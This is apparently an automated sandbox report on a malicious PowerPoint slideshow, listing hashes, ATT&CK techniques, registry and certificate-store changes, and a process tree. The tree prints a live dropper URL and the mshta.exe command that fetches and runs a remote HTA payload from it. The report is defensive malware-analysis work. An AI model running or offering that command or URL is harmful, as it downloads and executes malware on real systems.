a620c6c8eba080f448a230549de1e4653c7c9d661f7774b630e6d300edadf151

General

Target

a620c6c8eba080f448a230549de1e4653c7c9d661f7774b630e6d300edadf151.pps
Size

65KB
MD5

b3955e1cda42b669f89dd5f2ece4534e
SHA1

3e369400e83d66ebc6e704c6e2b7892f5907473f
SHA256

a620c6c8eba080f448a230549de1e4653c7c9d661f7774b630e6d300edadf151
SHA512

9b82c26b9dd9d1f617a38922cfa058ee40d491b4b46fefd60238934e576859a54ae3ca534763649b25b1caea76c69f2800a21a3ade75420acff87608763d97ad

Score

10^/10

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://%20%20@j.mp/asdasjASDASDxaksxm

Signatures

Process spawned unexpected child process 17 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

ipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exemshta.exeipconfig.exeipconfig.exeipconfig.exe

description	pid	pid_target	process	target process
Parent C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE is not expected to spawn this process	1960	1756	ipconfig.exe	POWERPNT.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE is not expected to spawn this process	1808	1756	ipconfig.exe	POWERPNT.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE is not expected to spawn this process	1304	1756	ipconfig.exe	POWERPNT.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE is not expected to spawn this process	1372	1756	ipconfig.exe	POWERPNT.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE is not expected to spawn this process	340	1756	ipconfig.exe	POWERPNT.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE is not expected to spawn this process	1072	1756	ipconfig.exe	POWERPNT.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE is not expected to spawn this process	1736	1756	ipconfig.exe	POWERPNT.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE is not expected to spawn this process	1716	1756	ipconfig.exe	POWERPNT.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE is not expected to spawn this process	1376	1756	ipconfig.exe	POWERPNT.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE is not expected to spawn this process	1824	1756	ipconfig.exe	POWERPNT.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE is not expected to spawn this process	1644	1756	ipconfig.exe	POWERPNT.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE is not expected to spawn this process	856	1756	ipconfig.exe	POWERPNT.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE is not expected to spawn this process	1668	1756	ipconfig.exe	POWERPNT.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE is not expected to spawn this process	1328	1756	mshta.exe	POWERPNT.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE is not expected to spawn this process	1552	1756	ipconfig.exe	POWERPNT.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE is not expected to spawn this process	860	1756	ipconfig.exe	POWERPNT.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE is not expected to spawn this process	1856	1756	ipconfig.exe	POWERPNT.EXE

Blocklisted process makes network request 3 IoCs

Processes:

mshta.exe

flow pid process

5 1328 mshta.exe
7 1328 mshta.exe
9 1328 mshta.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

flow	pid	process
5	1328	mshta.exe
7	1328	mshta.exe
9	1328	mshta.exe

Gathers network information 2 TTPs 16 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command-Line Interface

T1059

Processes:

ipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exe

pid	process
1960	ipconfig.exe
1304	ipconfig.exe
856	ipconfig.exe
1856	ipconfig.exe
1736	ipconfig.exe
1824	ipconfig.exe
1644	ipconfig.exe
860	ipconfig.exe
1552	ipconfig.exe
1808	ipconfig.exe
1372	ipconfig.exe
340	ipconfig.exe
1072	ipconfig.exe
1716	ipconfig.exe
1376	ipconfig.exe
1668	ipconfig.exe

Modifies Internet Explorer settings 1 TTPs 10 IoCs

adware spyware

Modify Registry

T1112

Processes:

POWERPNT.EXEmshta.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	POWERPNT.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	POWERPNT.EXE
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\Toolbar	POWERPNT.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	POWERPNT.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	POWERPNT.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	POWERPNT.EXE
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\MenuExt	POWERPNT.EXE
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	POWERPNT.EXE
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	POWERPNT.EXE

Modifies registry class 64 IoCs

Processes:

POWERPNT.EXE

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A5F-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A61-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A70-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A63-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A75-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493470-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934D5-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A59-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\Version = "2.a"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493457-5A91-11CF-8700-00AA0060263B}\TypeLib	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493475-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E559-4FF5-48F4-8215-5505F990966F}\ProxyStubClsid32	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149348E-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A67-F07E-4CA4-AF6F-BEF486AA4E6F}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E552-4FF5-48F4-8215-5505F990966F}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A5A-F07E-4CA4-AF6F-BEF486AA4E6F}\ = "ChartData"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A5D-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A71-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493467-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149347A-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934C5-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493450-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149347C-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934D5-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934DC-5A91-11CF-8700-00AA0060263B}\ = "TimeLine"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A76-F07E-4CA4-AF6F-BEF486AA4E6F}	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149345A-5A91-11CF-8700-00AA0060263B}\TypeLib	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149345D-5A91-11CF-8700-00AA0060263B}\TypeLib	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493481-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934CC-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934E3-5A91-11CF-8700-00AA0060263B}\TypeLib	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A55-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A7A-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493451-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493475-5A91-11CF-8700-00AA0060263B}\ = "Shapes"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493489-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934EB-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E555-4FF5-48F4-8215-5505F990966F}\TypeLib\Version = "2.a"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934EB-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A5D-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A5F-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493460-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149347A-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934CA-5A91-11CF-8700-00AA0060263B}\TypeLib	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A66-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A6B-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149348E-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934C3-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934EC-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493442-5A91-11CF-8700-00AA0060263B}\TypeLib	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A5B-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\Version = "2.a"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A5F-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A63-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149349C-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934F2-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A58-F07E-4CA4-AF6F-BEF486AA4E6F}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934EF-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A7C-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149345E-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149346A-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934D8-5A91-11CF-8700-00AA0060263B}\TypeLib	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934F5-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E552-4FF5-48F4-8215-5505F990966F}	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E556-4FF5-48F4-8215-5505F990966F}\ProxyStubClsid32	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149345B-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

mshta.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	mshta.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	mshta.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

POWERPNT.EXE

pid process

1756 POWERPNT.EXE
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

POWERPNT.EXE

pid process

1756 POWERPNT.EXE

pid	process
1756	POWERPNT.EXE

pid	process
1756	POWERPNT.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

POWERPNT.EXE

description	pid	process	target process
PID 1756 wrote to memory of 976	1756	POWERPNT.EXE	splwow64.exe
PID 1756 wrote to memory of 976	1756	POWERPNT.EXE	splwow64.exe
PID 1756 wrote to memory of 976	1756	POWERPNT.EXE	splwow64.exe
PID 1756 wrote to memory of 976	1756	POWERPNT.EXE	splwow64.exe
PID 1756 wrote to memory of 1960	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 1960	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 1960	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 1960	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 1808	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 1808	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 1808	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 1808	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 1304	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 1304	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 1304	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 1304	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 1372	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 1372	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 1372	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 1372	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 340	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 340	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 340	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 340	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 1072	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 1072	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 1072	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 1072	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 1736	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 1736	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 1736	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 1736	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 1716	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 1716	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 1716	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 1716	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 1376	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 1376	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 1376	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 1376	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 1824	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 1824	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 1824	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 1824	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 1644	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 1644	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 1644	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 1644	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 856	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 856	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 856	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 856	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 1668	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 1668	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 1668	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 1668	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 1328	1756	POWERPNT.EXE	mshta.exe
PID 1756 wrote to memory of 1328	1756	POWERPNT.EXE	mshta.exe
PID 1756 wrote to memory of 1328	1756	POWERPNT.EXE	mshta.exe
PID 1756 wrote to memory of 1328	1756	POWERPNT.EXE	mshta.exe
PID 1756 wrote to memory of 1552	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 1552	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 1552	1756	POWERPNT.EXE	ipconfig.exe
PID 1756 wrote to memory of 1552	1756	POWERPNT.EXE	ipconfig.exe

C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" /s "C:\Users\Admin\AppData\Local\Temp\a620c6c8eba080f448a230549de1e4653c7c9d661f7774b630e6d300edadf151.pps"
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1756

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:976

C:\Windows\SysWOW64\ipconfig.exe
ipconfig
2⤵
- Process spawned unexpected child process
- Gathers network information
PID:1960

C:\Windows\SysWOW64\ipconfig.exe
ipconfig
2⤵
- Process spawned unexpected child process
- Gathers network information
PID:1808

C:\Windows\SysWOW64\ipconfig.exe
ipconfig
2⤵
- Process spawned unexpected child process
- Gathers network information
PID:1304

C:\Windows\SysWOW64\ipconfig.exe
ipconfig
2⤵
- Process spawned unexpected child process
- Gathers network information
PID:1372

C:\Windows\SysWOW64\ipconfig.exe
ipconfig
2⤵
- Process spawned unexpected child process
- Gathers network information
PID:340

C:\Windows\SysWOW64\ipconfig.exe
ipconfig
2⤵
- Process spawned unexpected child process
- Gathers network information
PID:1072

C:\Windows\SysWOW64\ipconfig.exe
ipconfig
2⤵
- Process spawned unexpected child process
- Gathers network information
PID:1736

C:\Windows\SysWOW64\ipconfig.exe
ipconfig
2⤵
- Process spawned unexpected child process
- Gathers network information
PID:1716

C:\Windows\SysWOW64\ipconfig.exe
ipconfig
2⤵
- Process spawned unexpected child process
- Gathers network information
PID:1376

C:\Windows\SysWOW64\ipconfig.exe
ipconfig
2⤵
- Process spawned unexpected child process
- Gathers network information
PID:1824

C:\Windows\SysWOW64\ipconfig.exe
ipconfig
2⤵
- Process spawned unexpected child process
- Gathers network information
PID:1644

C:\Windows\SysWOW64\ipconfig.exe
ipconfig
2⤵
- Process spawned unexpected child process
- Gathers network information
PID:856

C:\Windows\SysWOW64\ipconfig.exe
ipconfig
2⤵
- Process spawned unexpected child process
- Gathers network information
PID:1668

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" http:\\%20%20@j.mp\asdasjASDASDxaksxm
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Modifies Internet Explorer settings
- Modifies system certificate store
PID:1328

